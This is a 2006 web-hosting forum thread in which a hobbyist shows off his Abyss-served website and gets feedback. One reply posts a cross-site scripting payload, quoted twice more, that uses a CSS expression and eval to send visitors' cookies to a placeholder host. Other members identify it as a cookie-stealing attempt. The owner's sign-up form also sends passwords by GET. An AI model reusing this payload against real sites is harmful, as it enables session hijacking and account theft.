My Website, dYslexia.

 
Post new topic   Reply to topic    Aprelium Forum Index -> Powered by Abyss
View previous topic :: View next topic  
Author Message
Phaux
-


Joined: 14 Jul 2006
Posts: 11
Location: Arizona, w00t

PostPosted: Fri Jul 14, 2006 7:05 am    Post subject: My Website, dYslexia. Reply with quote

I've been using Abyss X1 for a while now, and I like it a lot. My friend, who runs on Fedora with Apache2 doesn't think Abyss is capible of what Apache does, and whenever I talk about my server running on Abyss, he says 'you should use Apache instead'. Well, I happen to like Abyss!

You can visit my site via this link: http://dyslexia.zapto.org/

I run X1, and a port 80 redirect because COX Comm. blocks inbound port 80. One day I will purchase a real domain and X2, and go from there.

Also, the name dYslexia comes from when I first built my website, back when it didn't have a name. I posted a very crude site, and when I looked back at the source (I hand-type my HTML in Notepad, woot), I said to myself, 'I should really get something to treat my dyslexia' (corny, I know), and dyslexia rang some sort of bell in my head, and it's stuck ever since. So visit it!

Comments welcome, good or bad. Tell me what you like, or what I should fix.
_________________
http://phaux.bounceme.net:82/
Back to top View user's profile Send private message Visit poster's website
aprelium
-


Joined: 22 Mar 2002
Posts: 6800

PostPosted: Fri Jul 14, 2006 1:08 pm    Post subject: Re: My Website, dYslexia. Reply with quote

Phaux wrote:
I've been using Abyss X1 for a while now, and I like it a lot. My friend, who runs on Fedora with Apache2 doesn't think Abyss is capible of what Apache does, and whenever I talk about my server running on Abyss, he says 'you should use Apache instead'. Well, I happen to like Abyss!


Thank you for choosing Abyss Web Server. :-) And congratulations for your web site (BTW, it is very fast).
_________________
Support Team
Aprelium - http://www.aprelium.com
Back to top View user's profile Send private message Send e-mail
N30
-


Joined: 14 Jul 2006
Posts: 1

PostPosted: Fri Jul 14, 2006 4:17 pm    Post subject: well Reply with quote

<B C=">" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='font-size:0; X="<B ">'</B>
_________________
nEo ROCKS THE WORLD
Back to top View user's profile Send private message
TRUSTAbyss
-


Joined: 29 Oct 2003
Posts: 3752
Location: USA, GA

PostPosted: Fri Jul 14, 2006 4:43 pm    Post subject: Re: well Reply with quote

N30 wrote:
<B C=">" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='font-size:0; X="<B ">'</B>


Sorry man, HTML is not allowed in the forum.
Back to top View user's profile Send private message Visit poster's website
cmxflash
-


Joined: 11 Dec 2004
Posts: 872

PostPosted: Fri Jul 14, 2006 5:21 pm    Post subject: Re: well Reply with quote

TRUSTAbyss wrote:
N30 wrote:
<B C=">" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='font-size:0; X="<B ">'</B>


Sorry man, HTML is not allowed in the forum.


That was just a lame hacking attempt to steal users session cookies. He didn't even manage to change "www.url.com" to his own host.

Anyway, the website looks pretty good. Still, I hope you run PHP with safe mode enabled, since it would be easy to hack your server if somebody unknown is allwed to execute PHP-code on your machine.

Also, please save the IP-address by using a server-side script, this is pretty easy to modify:

<INPUT TYPE="HIDDEN" NAME="ip" VALUE="85.243.x.x">

I also think you should use a frame breaker to get rid of the No-ip ad on bottom of the page.

Just add this little javascript to your page:

Code:
<script language="Javascript">
<!--
if (top.location != self.location) {
top.location = self.location.href
}
//-->
</script>
Back to top View user's profile Send private message
Phaux
-


Joined: 14 Jul 2006
Posts: 11
Location: Arizona, w00t

PostPosted: Fri Jul 14, 2006 10:00 pm    Post subject: Reply with quote

Thanks for the comments!

I didn't think it would be very fast, but then again, I guess that PHP Gzip script I found worked like it should.

I thought to turn on safe mode in PHP, but I didn't want to turn it on untill i understood what it did fully. I figured it would severly lock down PHP, and turn on some sort of annoying debugging output.

As for the IP address, that was only temperary, I was going to figure out something a little better. What do you recommend for it?

As for the No-IP ad at the bottom, I tried using that exact framebuster script, and it did work, but then the hostname would be gone, and you'd be accessing the site via my IP, although that would work. I'll add it again, this time I'll leave it.
_________________
http://phaux.bounceme.net:82/
Back to top View user's profile Send private message Visit poster's website
Phaux
-


Joined: 14 Jul 2006
Posts: 11
Location: Arizona, w00t

PostPosted: Fri Jul 14, 2006 10:14 pm    Post subject: Reply with quote

Also, I need a little help on my sign-up form. I tried manually submitting data to step 4, and it was successful, but I can't seem to get my form to work. Any pointers? I'll include the entire form. Shouldn't think submit a Realname, Username, Password, eMail, and the Comments to teh PHP script in step 4?
Code:
<FORM ACTION="./?step=4" METHOD="GET">
  <TABLE BORDER="0" ALIGN="Center">
    <TR>
      <TD ALIGN="Right" VALIGN="Top">Your Real Name (Used for Identification):</TD>
      <TD ALIGN="Left" VALIGN="Top"><INPUT TYPE="TEXT" NAME="realname" SIZE="30"></TD>
    </TR>
    <TR>
      <TD ALIGN="Right" VALIGN="Top">Desired Username:</TD>
      <TD ALIGN="Left" VALIGN="Top"><INPUT TYPE="TEXT" NAME="username" SIZE="30"></TD>
    </TR>
    <TR>
      <TD ALIGN="Right" VALIGN="Top">Password:</TD>
      <TD ALIGN="Left" VALIGN="Top"><INPUT TYPE="PASSWORD" NAME="password" SIZE="30"></TD>
    </TR>
    <TR>
      <TD ALIGN="Right" VALIGN="Top">eMail:</TD>
      <TD ALIGN="Left" VALIGN="Top"><INPUT TYPE="TEXT" NAME="email" SIZE="30"></TD>
    </TR>
    <TR>
      <TD ALIGN="Right" VALIGN="Top">Comments:</TD>
      <TD ALIGN="Left" VALIGN="Top"><TEXTAREA NAME="comments" ROWS="5" COLS="30"></TEXTAREA></TD>
    </TR>
  </TABLE>
  <P STYLE="text-align:Center;"><INPUT TYPE="SUBMIT" VALUE="Sign Up"></P>
</FORM>


EDIT: I fixed it. <INPUT TYPE="HIDDEN" NAME="step" VALUE="4">
_________________
http://phaux.bounceme.net:82/
Back to top View user's profile Send private message Visit poster's website
Display posts from previous:   
Post new topic   Reply to topic    Aprelium Forum Index -> Powered by Abyss All times are GMT + 1 Hour
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB phpBB Group